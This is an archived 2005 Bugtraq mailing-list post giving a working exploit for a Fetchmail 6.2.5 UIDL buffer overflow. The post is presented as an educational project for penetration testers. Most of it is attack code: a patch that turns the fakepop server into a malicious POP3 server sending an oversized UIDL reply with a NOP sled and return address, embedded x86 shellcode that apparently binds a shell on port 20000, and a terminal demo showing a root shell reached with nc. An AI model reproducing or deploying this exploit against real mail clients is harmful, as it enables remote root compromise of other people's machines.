Fetchmail 6.2.5 exploit for Bugtraq ID: 14349
bannedit_at_frontiernet.net
Date: 08/30/05
- Previous message: Aaron Horst: "Re: PunBB BBCode IMG Tag Script Injection Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 30 Aug 2005 16:02:03 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is) The following exploit is brought to you by The Mantis Project which is a project geared towards learning the process of discovering and exploiting bugs in the wild. Exploits are based on published advisories which do not contain proof of concept code or unpublished findings. The project's purpose is to get a better understanding of wild bugs and the process of exploiting them while providing a resource to the community particularly penetration testers. So if you are interested in exploit development or just want to learn more about it feel free to join us on irc.pulltheplug.org #mantis or the mailing list at http://pulltheplug.org/cgi-bin/mailman/listinfo/mantis.
Special thanks to PullThePlug for hosting the project.
-------------------[exploit]-------------------
This patch is for fakepop version 7. fakepop is a fake pop3 server which is normally used to inform users of misconfigured clients.
Note: fakepop is ran by inetd
example:
<---+in terminal 1+--->
farenhiet:/home/bannedit/fetchmail-6.2.5# /usr/local/bin/fetchmail -p pop3 --fastuidl 1 localhost
fetchmail: removing stale lockfile
Enter password for root@localhost:
UIDL 2
<---+in terminal 2+--->
farenhiet:/home/bannedit/exploit# perl -e '$|++;while (<>) { print . "\n\x00"; }' | nc localhost 20000
id
uid=0(root) gid=0(root) groups=0(root)
<----+patch for fakepop-7+--->
--- fakepop-7/fakepop.c 2004-12-01 12:13:02.000000000 -0500
+++ fakepop.c 2005-08-29 18:45:01.096792176 -0400
@@ -29,7 +29,12 @@
if (strcasecmp ("stat", cmd) == 0) {
known = 1;
- printf("+OK %d %d\r\n", msg_gettotalmsgs(), msg_gettotalsize());
+ printf("+OK 8 %d\r\n", msg_gettotalsize());
+ }
+
+ if(strcasecmp("last", cmd) == 0){
+ known = 1;
+ printf("-ERR 1\r\n");
}
if (strncasecmp ("list", cmd, 4) == 0) {
@@ -56,25 +61,17 @@
}
if (strncasecmp ("uidl", cmd, 4) == 0) {
- char s[71];
- int i;
- known = 1;
- if (strlen(cmd) > 5) {
- /* single message uidl */
- i = atoi(cmd+5);
- id_get_uidl (i, s);
- printf("+OK %d %s\r\n",i,s);
- } else {
- /* all messages uidl */
- int j;
- j = msg_gettotalmsgs();
- printf("+OK\r\n");
- for (i = 1; i <= j; i++) {
- id_get_uidl (i, s);
- printf("%d %s\r\n",i,s);
- }
- printf(".\r\n");
- }
+ known=1;
+
+ char s[177]; //177
+ long addy=0xbfffd702;
+ int i=atoi(cmd+5);
+
+ memset(s, 0x90, sizeof(s));
+ *(long*)&s[sizeof(s)-5]=addy;
+ s[sizeof(s)-1]='\0';
+
+ printf("+OK %d %s\r\n",i+1,s);
}
if (strncasecmp ("retr", cmd, 4) == 0) {
@@ -122,8 +119,21 @@
msg_init();
- printf ("+OK fakepop V%s %s <1234.5678901234@fakepop.invalid>\r\n",
- PROGRAM_VERSION, URL);
+ char sc[]=
+ "\x31\xdb\x31\xc9\xf7\xe3"
+ "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b"
+ "\xcd\x80\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1"
+ "\xb0\xef\xf6\xd0\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0"
+ "\x66\x43\x43\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd"
+ "\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51"
+ "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53"
+ "\x89\xe1\xb0\xf4\xf6\xd0\xcd\x80";
+
+char buff[strlen(sc)+100];
+memset(buff, 0x90, sizeof(buff));
+memcpy(&buff[sizeof(buff)-strlen(sc)], sc, strlen(sc));
+ printf ("+OK fakepop V%s %s %s <1234.5678901234@fakepop.invalid>\r\n",
+ PROGRAM_VERSION, URL, sc);
fflush(stdout);
while ((running == 1) && (fgets(cmd, CMD_MAX_SIZE, stdin) != NULL)) {
- Previous message: Aaron Horst: "Re: PunBB BBCode IMG Tag Script Injection Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
